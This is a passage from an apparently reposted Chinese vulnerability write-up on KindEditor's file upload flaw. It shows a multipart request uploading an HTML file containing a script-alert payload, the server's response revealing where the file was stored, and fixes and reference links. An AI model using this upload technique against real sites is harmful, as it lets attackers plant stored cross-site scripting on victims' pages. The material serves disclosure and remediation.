-----------------------------283422705626536477632563104216 Content-Disposition: form-data; name=“imgFile”; filename=“1.html” Content-Type: application/octet-stream
<script>alert(‘1’)</script> -----------------------------283422705626536477632563104216–
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
Response数据包
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/
X-Powered-By: ASP.NET
Date: Thu, 09 Sep 2021 07:33:15 GMT
Connection: close
Content-Length: 94
{“error”:0,“url”:"/kindeditor/asp/…/attached/file/20210909/20210909153396539653.html"}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
漏洞修复
1.直接删除upload_json. 和file_manager_json. 2.升级kindeditor到最新版本
参考链接
https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/121295026